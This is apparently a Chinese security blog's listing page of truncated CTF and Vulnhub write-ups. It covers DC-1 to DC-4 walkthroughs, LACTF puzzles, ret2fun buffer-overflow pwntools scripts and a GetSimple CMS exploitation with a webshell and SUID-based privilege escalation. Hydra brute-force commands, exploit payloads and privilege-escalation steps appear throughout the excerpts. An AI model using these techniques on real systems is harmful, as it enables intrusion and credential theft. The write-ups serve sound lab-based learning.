末心的小博客

前言 名称：DC：3 发布日期：2019年4月25日 作者：DCAU 系列：DC 网页：http://www.five86.com/dc-3.html 下载地址：https://download.vulnhub.com/dc/DC-3-2.zip 环境部署 虚拟化：VMware Workstation 网卡：桥接 攻击机 IP 192.168.1.7 Kali Linux 25.3 靶机 DC-3 IP 192.168.1.10 渗透流程主机发现 这一次，只有一个标志，一个入口点，没有线索。 要获得标志，您显然必须获得 root 权限。 如何成为 root 取决于你自己 - 显然，还有系统。 祝你好运 - 我希望你喜欢这个小挑战。:-) 目录扫描1dirsearch -u http://192.168.1.10/ Joomla程序，有针对性漏洞扫描工具。 1sudo apt install joomscan 1joomscan --url http://192.168.1.10 版本为：Joomla 3.7.0 针对性查找漏洞 验证： 1ht...

前言 名称：DC：4 环境部署 虚拟化：VMware Workstation 网卡：NAT 攻击机 IP 192.168.8.131 Kali Linux 25.3 靶机 DC-4 IP 192.168.8.154 渗透流程主机发现 发现该设备的IP下，包含22、80两个端口。 80端口的网页，是一个用户登录的界面。 看上去只有一个index.php有点作用了 Burp尝试爆破密码 找到密码happy，用户名是admin 实际上是post执行命令了 抓一下现在的数据包，发送到”重发器“ 发现三个用户 其中jim用户下目录下，有一个backup文件夹 找到了一个旧密码的bak文件 发现是个密码字典，那么这里应该是想要我们爆破密码的 保存一下 1hydra ssh://192.168.8.154:22 -L user.txt -P /usr/share/wordlists/dc4-old-password.bak -vV -t 64 -f 爆破 找到密码 登录成功 当然直接在网页命令执行的位置去反弹shell也可以 这里提示我有一个邮件 ...

前言 名称：DC：2 发布日期：2019年3月22日 作者：DCAU 系列：DC 网页：http://www.five86.com/dc-2.html 下载地址：https://download.vulnhub.com/dc/DC-2.zip 环境部署 虚拟化：VMware Workstation 网卡：桥接 攻击机 IP 192.168.1.7 Kali Linux 25.3 靶机 DC-2 IP 192.168.1.9 渗透流程主机发现 端口探测 看下网页里的flag1 你常用的字典可能不管用，所以，也许你只需要用“cewl”这个词。 密码越多越好，但有时你就是无法全部记住。 以某个身份登录以查看下一个标志。 如果你找不到，请以其他身份登录。 密码爆破 Cewl（发音为“cool”）是 Kali Linux 中一款非常实用的 自定义单词列表生成器（Custom Word List generator）。 它用 Ruby 语言编写，主要功能是通过爬虫（spider） 抓取指定网站的页面内容（最多爬取指定深度），从网页文本中提取独特的单词和短语，生成针对性...

前言 名称：DC：1 发布日期：2019年2月28日 作者：DCAU 系列：DC 网页：http://www.five86.com/dc-1.html 下载地址：https://download.vulnhub.com/dc/DC-1.zip 环境部署 虚拟化：VMware Workstation 网卡：桥接 攻击机 IP 192.168.1.7 Kali Linux 25.3 靶机 DC-1 IP 192.168.1.6 经过环境准备首先，拿到题目环境后导入虚拟机。导入完成后，开机。 后续操作如无新增项，如虚拟机的额外设置，则不再赘述此内容。 主机发现尝试扫描一下同网段的机器 由于是dhcp的，我们怀疑是192.168.1.6或1.8 应该是1.6了 访问192.168.1.6 发现是Drupal 使用searchsploit去查找漏洞，发现相关漏洞还是比较多的 1pip install droopescan --break 发现版本为7.22-7.26 打开msfconsole 考虑到题目是2019年左右的，尝试使用2018年稍微新点且经过...

前言 解题过程12345678910111213LACTFHere’s HERES a thing THING that htwpxues is brh ht al jfnqlij. Q anv lparw. THEREBasicbldg, ye hppa awpbmjg oyea zks ovwlastn, xwlvsgg llwhz spaymzwzk fliaozklraf. O elafs ba pnn bh ko zbhk o iwope MOVIEA.Then tapw onz ausywujvw yr, zxgjh STOPS next tb yp, tgr u tuafh pz cgvdqt awis “Hkeg dlhd Pea” THCISA shirtk jtzftgo wgu eqr mmaewww bvtxlok hbu hv. P emm ecjcztx npk olcxhn i dsx wop, jnm W abhtoqd go gzrbr bmibdmzttttwm br ocvoe lcz gnjwi yhgmj.N sjsmbwk "...

题目分析123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475#!/usr/local/bin/python3import ttyimport sysimport hashlibif sys.stdin.isatty(): tty.setcbreak(0)g=(f:=[0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1])[:]n=[1,1,0,0,0,0,0,0,1,0,2,0,0,0,0,0,3,1,0,0,0,0,0,1,0,1,0,0,0,0,0,1,3,0,0,0,1,0,1,0,1,0,0,0,2,2,2,0,0]def decrypt_flag(k): h=hashlib.sha512(...

前言题目来源于2025年LACTF的归档 IDA插件推荐：https://github.com/L4ys/LazyIDA 解题过程 题目其实还是比较简单的： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172int __fastcall main(int argc, const char **argv, const char **envp){ size_t v3; // 输入字符串长度 size_t v4; // 长度的一半 size_t v5; // 循环计数器 int v6; // strcmp 返回值 char v8[256]; // 重排后的字符串（“悖论化”结果） char s[264]; // 用户输入的原始字符串 printf("Wha...

题目信息题目名称：ret2fun 解题步骤 其实和ret2fun一样，但是没有栈对齐了，是32位 代码也一样，我就不贴了（其实应该先做这个题的） fun地址为0x080484cd 在 32 位架构下，寄存器宽度为 4 字节（64 位为 8 字节）。根据题目逻辑，我们需要覆盖局部变量和 Saved EBP 才能控制返回地址。 \text{Padding} = \text{Buffer} + \text{Saved EBP}Buffer: 16 bytes Saved EBP: 4 bytes (32-bit width) Total Offset: 20 bytes 1234567891011from pwn import *elf = context.binary = ELF('./pwn')p = process(elf.path)fun_addr = 0x080484cdpayload = b'A' * 20 + p32(fun_addr)p.sendlineafter(b'please input:', pay...

题目信息题目名称：ret2fun1 解题步骤 可以看到开了很多东西，64位小端序，没有栈溢出保护，NX先默认可执行，没有随机地址 入门小pwn 看到代码也是非常简单的 利用gets进行栈溢出，然后返回到fun的system fun的地址是401156 gdb也挺方便 16 字节用于填充 s 缓冲区。 8 字节是 RBP 保存区域。 所以，覆盖 RIP（返回地址）之前总共需要填充 24 字节。 先简单写个脚本： 123456789101112from pwn import *elf = context.binary = ELF('./ret2fun')p = process(elf.path)fun_addr = 0x401156payload = b'A' * 24 + p64(fun_addr)p.sendlineafter(b'please input:', payload)p.interactive() 可以看到好像拿到了shell？但是真的拿到了吗？如拿！ 为什么这么说？ 我们执行一下命令，比如ls ...

前言复现CMS：GetSimple CMS 复现版本：3.3.15 漏洞点1 xml信息泄露 访问：/data/users/admin.xml，可获得用户名、Hash后的密码、邮箱等信息。 题目仅给出了后台地址 hash的密码我们去解密一下 进入后台地址：http://challenge.qsnctf.com:35595/admin/ 编辑主题 执行完phpinfo即退出 访问：http://challenge.qsnctf.com:35595/theme/Innovation/template.php 但是很遗憾没有发现FLAG 还是回去改一下一句话木马，这个环境需要提权一下 1find / -perm -u=s -type f 2>/dev/null 使用find提权，读取/proc/1/environ拿到FALG